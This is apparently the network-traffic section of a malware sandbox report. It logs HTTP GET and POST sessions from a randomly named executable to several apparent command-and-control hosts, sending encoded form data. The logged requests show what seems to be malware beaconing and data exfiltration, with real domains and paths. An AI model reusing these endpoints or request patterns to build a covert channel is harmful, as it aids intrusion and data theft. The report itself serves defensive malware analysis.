                                                                                                                            Data Raw: 32 42 57 44 47 3d 6b 7a 72 53 78 7a 47 67 4a 75 47 73 68 6f 4c 2f 6d 6f 70 71 53 4f 64 30 68 52 61 68 4f 37 79 4b 4b 72 75 65 6c 70 5a 6b 6c 54 79 68 64 58 57 7a 71 7a 52 73 64 49 42 4d 58 68 6f 6c 63 59 7a 2b 44 6d 34 56 61 2b 4f 53 50 6a 69 59 59 57 77 53 58 64 6b 72 39 43 54 50 2f 6b 76 59 6a 45 33 4c 41 36 43 44 4c 55 61 7a 77 49 31 74 38 4d 56 42 7a 6b 51 72 74 6f 56 54 5a 4d 2f 61 62 76 79 45 63 34 6c 63 77 43 6c 49 74 34 30 32 59 31 6a 4e 47 6f 38 71 67 57 65 65 71 42 41 61 47 34 2b 4b 4d 66 53 51 32 79 79 31 59 4a 4b 32 69 62 45 5a 38 36 4b 4d 54 51 57 78 64 5a 36 76 32 73 31 58 44 63 35 44 4c 41 52 6a 64 78 76 4d 50 4d 37 6e 71 4d 49 33 44 68 36 61 58 75 72 75 77 64 78 69 72 75 65 36 62 32 4b 59 31 34 53 55 6e 33 2b 46 4e 79 79 4a 38 50 6b 6c 48 38 63 47 73 2f 31 4c 38 4d 75 47 4b 70 64 77 67 39 38 37 50 56 42 53 62 37 30 36 44 45 4f 5a 30 39 41 36 6a 53 6f 73 41 2f 62 4d 4e 79 4c 54 74 6e 72 6c 50 65 70 6d 6a 59 6c 30 72 69 44 34 72 33 7a 36 59 4e 43 4b 6b 41 39 37 49 31 75 45 58 61 41 69 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=kzrSxzGgJuGshoL/mopqSOd0hRahO7yKKruelpZklTyhdXWzqzRsdIBMXholcYz+Dm4Va+OSPjiYYWwSXdkr9CTP/kvYjE3LA6CDLUazwI1t8MVBzkQrtoVTZM/abvyEc4lcwClIt402Y1jNGo8qgWeeqBAaG4+KMfSQ2yy1YJK2ibEZ86KMTQWxdZ6v2s1XDc5DLARjdxvMPM7nqMI3Dh6aXuruwdxirue6b2KY14SUn3+FNyyJ8PklH8cGs/1L8MuGKpdwg987PVBSb706DEOZ09A6jSosA/bMNyLTtnrlPepmjYl0riD4r3z6YNCKkA97I1uEXaAiWBUX8Xx+vJvfhW3NijS+9ekjxkis0CBwlNpiAqKmXy+YFnRv5aiIeUa+gsIqwTMedUAajtkMpGcjaGE0uTWtmqaf2dj1LUacGgMu9nQ1hXU4u6SOtYKJfL+rqJGUPh+KNMEnp/ake0pyhE0EbQFE5fQKjPOLjWXvwrJHY6ekMmC+fh/Megsn0d2d5bcuaeHugvW3pqcTtrzr9TAavFRhs83/nc/os4yw++T+3ZJNzIY7rsbntjoDlfkHXOnBoisJwx/lOGMBWmiQrzWCe0z1dn6Aq6yhC/SiJ3dyV9uJBzkT7gHlWEJwZzJhrYUdnK8R0vaBmXq+V+BC6ZLsXS2bMIT2c+I/s9YkP2cd/FCG/g9QlHxDLdlXqMe/R0L3stsY9VIMZrOCwB2jSntD04fhNGNXv3cVNwlddsjcAbcSK6lUjgFizPtIHnFEdcbJ3eGxxL5Wkh8pYOpNVPSx6fFGoHSnTw4Eed81vOrdfb7HaZNsWBJuaA6ipvtjpdHShwoSxAUol9oyt1StsWLRnVQHOig6CevnVc3luOClTciRW67r/UzqcuAG7p1aPNb/E9usHeQCa5d2B6Wy3MFs9KFgXG0FYX2Tw8oLHf/PBPE6K7xG3TTzNUMogkrGqUG1rwZc7ACRroiqohcY8adysECtQQlMypYx659Cbk [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:57:52.037790060 CEST896INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:51 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.450019203.161.41.204803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:53.879705906 CEST594OUTGET /w90v/?2BWDG=pxDyyHWOZ6ShkfCEnqNJFogO2iS2H7GTGeagqdlkqhurb1KRhlhkT/xhewcGJOmLLVVpZKefMTitXH9lS8UNo0PZm0vp/3iOIb2YKVi8sc5e3OZy6VAXooU=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:54.578121901 CEST911INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:54 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.4500203.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:59.666585922 CEST881OUTPOST /zqr8/ HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cablecarrental.net
                                                                                                                            Referer: http://www.cablecarrental.net/zqr8/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 54 48 49 58 38 48 58 6c 62 67 31 52 47 6d 43 4c 38 39 39 54 77 6a 53 31 79 4a 42 7a 31 2b 58 49 79 59 79 6b 53 78 66 30 51 2b 65 77 52 4d 59 45 59 61 6a 79 51 6d 50 52 41 58 6a 4f 67 57 53 51 72 44 6b 62 66 6e 37 79 6e 44 70 48 31 38 77 35 6b 58 77 5a 57 4e 2f 59 66 38 68 2f 48 6b 67 6c 36 79 7a 76 45 4c 33 5a 68 31 4c 34 74 56 34 30 4d 33 4e 6e 52 41 65 63 48 4d 58 69 30 57 6a 6b 55 41 76 43 51 4b 64 32 47 4d 67 46 35 44 43 48 6b 45 58 34 68 36 41 73 4e 51 56 6d 6a 68 37 78 71 58 4d 41 75 4e 73 4a 4e 6a 56 31 41 65 38 7a 5a 4e 64 67 75 49 52 72 52 43 63 31 43 6f 44 41 4b 77 3d 3d
                                                                                                                            Data Ascii: 2BWDG=THIX8HXlbg1RGmCL899TwjS1yJBz1+XIyYykSxf0Q+ewRMYEYajyQmPRAXjOgWSQrDkbfn7ynDpH18w5kXwZWN/Yf8h/Hkgl6yzvEL3Zh1L4tV40M3NnRAecHMXi0WjkUAvCQKd2GMgF5DCHkEX4h6AsNQVmjh7xqXMAuNsJNjV1Ae8zZNdguIRrRCc1CoDAKw==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.4500213.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:02.207951069 CEST901OUTPOST /zqr8/ HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cablecarrental.net
                                                                                                                            Referer: http://www.cablecarrental.net/zqr8/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 54 48 49 58 38 48 58 6c 62 67 31 52 45 47 65 4c 2b 61 52 54 33 44 53 32 33 4a 42 7a 75 4f 58 55 79 59 2b 6b 53 77 62 65 51 4e 36 77 52 74 6f 45 4a 6f 62 79 56 6d 50 52 4c 33 6a 78 2f 6d 54 39 72 43 59 54 66 6c 76 79 6e 44 39 48 31 39 41 35 6c 6b 59 61 5a 39 2f 61 57 63 68 39 4b 45 67 6c 36 79 7a 76 45 4c 69 79 68 31 44 34 74 6c 49 30 4d 57 4e 6b 51 41 65 66 47 4d 58 69 6c 47 69 76 55 41 75 6c 51 4c 41 54 47 49 51 46 35 42 4b 48 6c 56 58 33 71 36 42 6e 53 41 55 4c 67 54 71 6f 73 47 4a 50 77 64 73 2b 43 6d 78 50 46 59 74 70 49 38 38 33 38 49 31 59 4d 46 56 42 50 72 2b 4a 52 32 77 32 4d 71 34 39 74 65 54 55 56 71 6a 38 75 7a 53 70 7a 65 63 3d
                                                                                                                            Data Ascii: 2BWDG=THIX8HXlbg1REGeL+aRT3DS23JBzuOXUyY+kSwbeQN6wRtoEJobyVmPRL3jx/mT9rCYTflvynD9H19A5lkYaZ9/aWch9KEgl6yzvELiyh1D4tlI0MWNkQAefGMXilGivUAulQLATGIQF5BKHlVX3q6BnSAULgTqosGJPwds+CmxPFYtpI8838I1YMFVBPr+JR2w2Mq49teTUVqj8uzSpzec=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.4500223.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:04.758877993 CEST10983OUTPOST /zqr8/ HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cablecarrental.net
                                                                                                                            Referer: http://www.cablecarrental.net/zqr8/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 54 48 49 58 38 48 58 6c 62 67 31 52 45 47 65 4c 2b 61 52 54 33 44 53 32 33 4a 42 7a 75 4f 58 55 79 59 2b 6b 53 77 62 65 51 4e 79 77 52 66 67 45 62 2f 50 79 53 6d 50 52 49 33 6a 77 2f 6d 53 2f 72 44 77 58 66 6c 53 48 6e 41 46 48 31 66 6b 35 69 56 59 61 43 74 2f 61 55 63 68 38 48 6b 67 4b 36 79 44 7a 45 4c 79 79 68 31 44 34 74 6d 51 30 4f 48 4e 6b 53 41 65 63 48 4d 58 75 30 57 69 48 55 41 32 66 51 4c 46 6d 48 35 73 46 35 68 36 48 69 6e 2f 33 6f 61 42 6c 52 41 55 54 67 54 6d 4e 73 43 70 74 77 65 78 70 43 67 4e 50 45 4d 41 51 53 2f 30 42 69 70 4e 47 58 48 4a 32 47 5a 36 55 49 6b 51 6a 64 50 38 52 37 64 6e 35 49 36 4f 55 30 42 4f 4a 78 61 44 64 74 74 50 51 73 72 34 61 79 63 51 6d 38 4b 67 52 64 73 45 79 54 77 38 65 53 69 66 65 51 44 4e 57 77 53 31 45 39 33 52 4c 31 67 7a 6c 72 79 68 4d 4b 66 2f 6d 45 6e 55 65 75 54 75 77 64 32 45 45 36 57 57 34 4a 67 30 59 5a 45 4a 68 4a 56 56 48 34 6c 48 78 74 70 67 73 42 6e 4e 61 78 44 5a 56 2b 2b 38 39 32 52 39 58 73 51 66 39 43 77 77 79 6b 4e 7a 30 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=THIX8HXlbg1REGeL+aRT3DS23JBzuOXUyY+kSwbeQNywRfgEb/PySmPRI3jw/mS/rDwXflSHnAFH1fk5iVYaCt/aUch8HkgK6yDzELyyh1D4tmQ0OHNkSAecHMXu0WiHUA2fQLFmH5sF5h6Hin/3oaBlRAUTgTmNsCptwexpCgNPEMAQS/0BipNGXHJ2GZ6UIkQjdP8R7dn5I6OU0BOJxaDdttPQsr4aycQm8KgRdsEyTw8eSifeQDNWwS1E93RL1gzlryhMKf/mEnUeuTuwd2EE6WW4Jg0YZEJhJVVH4lHxtpgsBnNaxDZV++892R9XsQf9CwwykNz0qXNW2OfTdfq7DldWycs7w3j+Yd2UyBWn206AJ5iUOWRDHvLS1vZVjdlptI7fqwhqAojPQXw03Zyw0gPPJS+VV4X7C4OJDA4RZIW7TorfaLtw0eXpqrJGVe0gqtH8x90K47XPk/EO74p3SYFprhwdCdR9fA3LbAdJ959nJJz1e6Vq81muzpa+/N1MmJ4FH8qNQYlWcF3DBMA64O5bWTnZelFKltbt59KPzW/bFeGn9nSTdP3mJ94imOviK1T6qGWJNNCrWwNII9LU4vWRnxeKkZEFboWP9qVaMC5iinp7gK/FmDDEbvJxau7SFohAs9eNLfU9Bx5TMbkVJvXphfobIyh6m8b8fUf4KbRgkejjtJkEwkq1dh6OuVoBvN7BDr2kD3s2IKFyyHk1rsp9v+Hw1I5owpMf+jDkdfmADjFptLMjzD5Sh3Z0hON2/wc0n3nrlHiuHoWHJ3Ntgo7F9xBrTHXg63GPy18blvqJyQb08B9oYoTqJw4yBYfO1AtwjFy0gQnek/VSL0Pqt74zxEseGHXaPMEKxZTC9wDKKdLES8u98WJe+OkGwk5XO9+cp+XjhfTGs6BGXGB6+bTpjRDuVgcOP3GyEgX3hHN6PnwqtzW1TgqCD1g0kq2ymRfU/I6kWrjjMf4uw2Na4zglXopFLCw94AoTJWjxuF [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.4500233.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:07.298891068 CEST601OUTGET /zqr8/?wfm=G6oTo8vx&2BWDG=eFg3/wX1FEtYOEOO4fQK8DyYn+9t5MnQ8eGMWFr4U+K0Svorcp+hU2bkMlDd81KIhBlHBG6GkgZ398FJiVEbDYmwZdVtcUsewSnSC4COghX7uWVmIVZIHjw= HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:58:07.936068058 CEST394INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:07 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 66 6d 3d 47 36 6f 54 6f 38 76 78 26 32 42 57 44 47 3d 65 46 67 33 2f 77 58 31 46 45 74 59 4f 45 4f 4f 34 66 51 4b 38 44 79 59 6e 2b 39 74 35 4d 6e 51 38 65 47 4d 57 46 72 34 55 2b 4b 30 53 76 6f 72 63 70 2b 68 55 32 62 6b 4d 6c 44 64 38 31 4b 49 68 42 6c 48 42 47 36 47 6b 67 5a 33 39 38 46 4a 69 56 45 62 44 59 6d 77 5a 64 56 74 63 55 73 65 77 53 6e 53 43 34 43 4f 67 68 58 37 75 57 56 6d 49 56 5a 49 48 6a 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wfm=G6oTo8vx&2BWDG=eFg3/wX1FEtYOEOO4fQK8DyYn+9t5MnQ8eGMWFr4U+K0Svorcp+hU2bkMlDd81KIhBlHBG6GkgZ398FJiVEbDYmwZdVtcUsewSnSC4COghX7uWVmIVZIHjw="}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.450024221.128.225.57803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:13.986521959 CEST863OUTPOST /90ie/ HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cqghwamc.top
                                                                                                                            Referer: http://www.cqghwamc.top/90ie/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4e 48 49 76 62 50 36 45 6c 50 47 30 30 6a 68 54 74 36 30 39 6d 39 2f 47 51 66 37 4d 38 4b 44 38 79 67 48 74 51 67 77 34 52 58 53 4b 65 55 38 45 6c 48 31 65 54 69 47 65 56 30 62 68 4c 62 4d 6c 34 41 77 34 4d 76 62 79 53 6d 65 50 73 4f 58 68 49 36 57 61 2b 62 2b 38 2f 73 6f 66 75 73 66 51 71 37 79 53 7a 6f 4a 63 37 31 31 52 73 4c 71 4e 36 42 52 54 74 6a 68 44 33 70 6d 50 32 39 66 34 4e 48 62 69 2b 50 4a 61 4a 57 52 43 52 7a 31 31 49 4d 50 32 50 31 2b 35 48 33 47 4f 69 44 65 64 74 46 61 4b 46 31 4e 39 61 38 65 33 57 42 2b 41 71 79 30 76 68 37 43 52 77 45 35 76 71 56 6f 39 6b 41 3d 3d
                                                                                                                            Data Ascii: 2BWDG=NHIvbP6ElPG00jhTt609m9/GQf7M8KD8ygHtQgw4RXSKeU8ElH1eTiGeV0bhLbMl4Aw4MvbySmePsOXhI6Wa+b+8/sofusfQq7ySzoJc711RsLqN6BRTtjhD3pmP29f4NHbi+PJaJWRCRz11IMP2P1+5H3GOiDedtFaKF1N9a8e3WB+Aqy0vh7CRwE5vqVo9kA==
                                                                                                                            Oct 19, 2024 12:58:14.948312998 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a671d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:13 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                                                            Oct 19, 2024 12:58:14.950340986 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
